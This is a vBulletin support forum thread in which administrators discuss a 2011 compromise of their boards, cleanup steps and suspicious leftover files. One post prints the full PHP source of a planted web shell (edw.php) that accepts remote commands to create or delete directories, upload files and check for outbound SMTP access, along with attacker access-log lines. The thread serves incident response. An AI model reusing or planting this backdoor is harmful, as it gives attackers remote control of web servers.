Announcement

Collapse
No announcement yet.

Kokosina.in - Anyone Else Getting This?

Collapse
X
 
  • Filter
  • Time
  • Show
Clear All
new posts

  • Simtech
    replied
    I had this too - clean install back in July 2011... users were getting alerts on ver 4.1.11.

    Leave a comment:


  • TheWindows7Site
    replied
    https://www.vbulletin.com/forum/show...-How-to-remove

    Leave a comment:


  • RobHW
    replied
    It looks like my forums are clean now. I was running VBulletin 4.0.8. I upgraded with a clean install to VBulletin 4.1.9. The clean install insured that any compromised VBulletin source files were removed. During the install, once you're in the AdminCP, all of the modified templates are identified and you're given the option to revert them, which I did. This insured that any compromised templates were corrected. I gather the vulnerability that existed in some versions, like 4.0.8, has been corrected by (or even before) the latest version 4.1.9, so I'm hopeful that this is behind me now. Google has reviewed my forums and detected no malware.

    I've added an .htaccess file in my root directory to block the IP identified in the earlier post by Wayne. I think having just the one .htaccess file in the root directory may be best. If any .htaccess files appear in sub-directories then I'll know just by their prescence that they are bogus and should be deleted.

    I changed my FTP and VBulletin Admin passwords. I don't think these were compromised, but just to be careful.

    Many thanks to Wayne for the excellent and timely support.

    Leave a comment:


  • Wayne Luke
    replied
    I'd recommend not running the main site under HTTPS. If you do then make sure all your settings point to the SSL version.

    For security, just the Admin CP and it doesn't have the reliance on AJAX and Javascript that main site does so it will work better.

    Leave a comment:


  • ramf02
    replied
    I modified the .htaccess file in the main directory to have the entire site run under ssl. I'm accepting the 'security warning', but all I get is a blank page. The new thread never posts. I can, however, reply to posts. It's just hard to pinpoint what the problem might be since I've done several things over the past few weeks to get rid of the virus and prevent my site from getting another one. Do you have any recommended actions to fix this? Any maintenance I can do on the board? Should I try re-instaling 4.19? Thanks,
    Frank

    Leave a comment:


  • Wayne Luke
    replied
    Originally posted by ramf02 View Post
    Ok so I've opened up the board again and I can't seem to be able to post new threads. I can reply, though. My forum is here: https://www.richardbey.org/forums. When submitting the form to post a new thread i get this now: Although this page is encrypted, the information you have entered is to be sent over an unencrypted connection and could easily be read by a third party.

    Is it not posting because it's going through the SSL now? Thoughts? Thanks,
    Frank
    That is a browser security warning. So you would have to accept that in order to post. If you're going to run under SSL, you should make sure your entire forums run under SSL.

    Leave a comment:


  • ramf02
    replied
    Ok so I've opened up the board again and I can't seem to be able to post new threads. I can reply, though. My forum is here: https://www.richardbey.org/forums. When submitting the form to post a new thread i get this now: Although this page is encrypted, the information you have entered is to be sent over an unencrypted connection and could easily be read by a third party.

    Is it not posting because it's going through the SSL now? Thoughts? Thanks,
    Frank

    Leave a comment:


  • Wayne Luke
    replied
    Like I said, the contents of that folder are to install the default data that comes with the CMS. If all you had was the forum, I am not sure why you have those files.

    Leave a comment:


  • ramf02
    replied
    Originally posted by Wayne Luke View Post
    Like I said, the jsonwrapper folder isn't a valid folder in 4.1.9 so you can probably delete. Don't know if it is was added by an addon though.

    The cmsdefaultdata folder contains the information that is optionally imported when you install/upgrade the Publishing Suite. If you delete it, it won't hurt anything but it is a valid folder.
    Ok I'm deleting both of those folders. The file names in the cmsdefaultdata just seemed too odd -- like they were ads for something. I'm curious, though, what do you mean install/upgrade the publishing suite? All I have ever had was the vbulletin message board.

    Leave a comment:


  • ramf02
    replied
    ok thanks. the names of those html files seemed strange/foreign sounding to me, so i figured i'd ask.

    Leave a comment:


  • Wayne Luke
    replied
    Like I said, the jsonwrapper folder isn't a valid folder in 4.1.9 so you can probably delete. Don't know if it is was added by an addon though.

    The cmsdefaultdata folder contains the information that is optionally imported when you install/upgrade the Publishing Suite. If you delete it, it won't hurt anything but it is a valid folder.

    Leave a comment:


  • ramf02
    replied
    So what should I do about the jsonwrapper directory? Delete it?

    How about the cmsdefaultdata folder? I did some digging in it and it has a ton of files. It has a subdirectory with my admin name and files such as jimm-na-russkom.html, jimm-nastroyka-nokia-6233.html, and aska-na-telefon-samsung-gt-s5230.html. What the heck are these? Parts of the virus?? Most of the files in the cmsdefaultdata folder have the same dates as the files I deleted from earlier which leads me to believe they're part of the virus. There's also a ton of .jpgs and.pngs in the attachments subdirectory (same date as previously cleared out files) with names of 37236-37647. If these are still part of the virus then why didn't the file scanner find these? Is it because they're in directories that vbulletin isn't even looking for?


    Thanks,
    Frank

    Leave a comment:


  • Wayne Luke
    replied
    Originally posted by mmavipc View Post
    This happened on my 4.1.9 board, the only file that the checker found without default contents was class_core.php which I modified for cloudflare.

    File found: edw.php
    Here's the log of it being created
    178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"

    I was running an old VB version back then.
    Most likely your source of infection and why we recommend customers keep their software up to date.

    Leave a comment:


  • Wayne Luke
    replied
    Originally posted by ramf02 View Post
    While deleting my files, I came across a directory that didn't seem to get checked: includes/facebook/jsonwrapper. The date is the same date as all the files I'm deleting. Should this folder exist? Same with install/cmsdefaultdata folder, and there is an index.html file in the /install folder with the date of all the suspect files. Thanks!
    There is no directory jsonwrapper in vBulletin. The /includes/facebook/ directory is valid though.

    Most directories include an index.html file. These are 0 byte empty files and put there just in case a web server has file indexing turned on for some reason. They prevent lookie-loos from seeing the contents of the individual directories.

    Leave a comment:


  • mmavipc
    replied
    This happened on my 4.1.9 board, the only file that the checker found without default contents was class_core.php which I modified for cloudflare.

    File found: edw.php
    contents
    Code:
    <?php
    
    
    
    
    
    
    function LoadExtension($ext)
    
    
    {
    
    
        $lib = $ext.'.so';
    
    
        if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
    
    
            $lib = 'php_'.$ext.'.dll';
    
    
        
    
    
        if(!extension_loaded($ext))
    
    
        {
    
    
            if(!dl($lib))
    
    
                return FALSE;
    
    
        }
    
    
        return TRUE;
    
    
    }
    
    
    
    
    
    
    function Check25Port()
    
    
    {
    
    
        $res = TRUE;
    
    
        $s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    
    
        if(@socket_connect($s, 'mxs.mail.ru', 25) == FALSE)
    
    
            $res = FALSE;
    
    
        socket_close($s);
    
    
        return $res;
    
    
    }
    
    
    
    
    
    
    function Check()
    
    
    {
    
    
        // Version >= 4.1.0
    
    
        if(strnatcmp(phpversion(), '4.1.0') < 0)
    
    
            return FALSE;
    
    
        // Check for safe mode
    
    
        //if(ini_get('safe_mode'))
    
    
        //    return FALSE;
    
    
        // Check 'sockets' ext
    
    
        if(!LoadExtension('sockets'))
    
    
            return FALSE;
    
    
        // Check 25 port
    
    
        if(!Check25Port())
    
    
            return FALSE;        
    
    
    
    
    
    
        return TRUE;
    
    
    }
    
    
    
    
    
    
    function RemoveDir($dir)
    
    
    {
    
    
      $res = FALSE;
    
    
      if(is_dir($dir))
    
    
      {
    
    
        $objects = scandir($dir);
    
    
        foreach($objects as $object)
    
    
        {
    
    
          if($object != "." && $object != "..")
    
    
          {
    
    
            if(filetype($dir."/".$object) == "dir")
    
    
              RemoveDir($dir."/".$object);
    
    
            else
    
    
              unlink($dir."/".$object);
    
    
          }
    
    
        }
    
    
        reset($objects);
    
    
        $res = rmdir($dir);
    
    
      }
    
    
      return $res;
    
    
    }
    
    
    
    
    
    
    function Upload($dir)
    
    
    {
    
    
      $res = move_uploaded_file($_FILES["file"]["tmp_name"], $dir.'/'.$_FILES["file"]["name"]);
    
    
      return $res;
    
    
    }
    
    
    
    
    
    
    
    
    
    
    function Work()
    
    
    {
    
    
      $type = $_POST['type'];
    
    
      $res  = FALSE;
    
    
      
    
    
      echo('EDW');
    
    
      if($type == 'check')
    
    
      {
    
    
        $res  = Check();
    
    
      }
    
    
      else if($type == 'mkdir')
    
    
      {
    
    
        $dir  = $_POST['dir'];
    
    
        $res  = mkdir($dir);
    
    
      }
    
    
      else if($type == 'rmdir')
    
    
      {
    
    
        $dir  = $_POST['dir'];
    
    
        $res  = RemoveDir($dir);
    
    
      }
    
    
      else if($type == 'upload')
    
    
      {
    
    
        $dir  = $_POST['dir'];
    
    
        $res  = Upload($dir);
    
    
      }
    
    
    
    
    
    
      if($res)
    
    
        echo('OK');
    
    
      else
    
    
        echo('FAILED');
    
    
    }
    
    
    
    
    
    
    Work();
    
    
    
    
    
    
    ?>
    Here's the log of it being created
    178.16.22.59 - - [08/Dec/2011:02:27:26 -0700] "POST /forum/commons.php HTTP/1.1" 200 89892 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:43 -0700] "POST /forum/commons.php HTTP/1.1" 200 10162 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"
    178.16.22.59 - - [08/Dec/2011:02:27:44 -0700] "POST /forum/edw.php HTTP/1.1" 200 335 "-" "Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)"

    I was running an old VB version back then.
    Last edited by mmavipc; Thu 5 Jan '12, 11:34pm.

    Leave a comment:

Related Topics

Collapse

Working...
X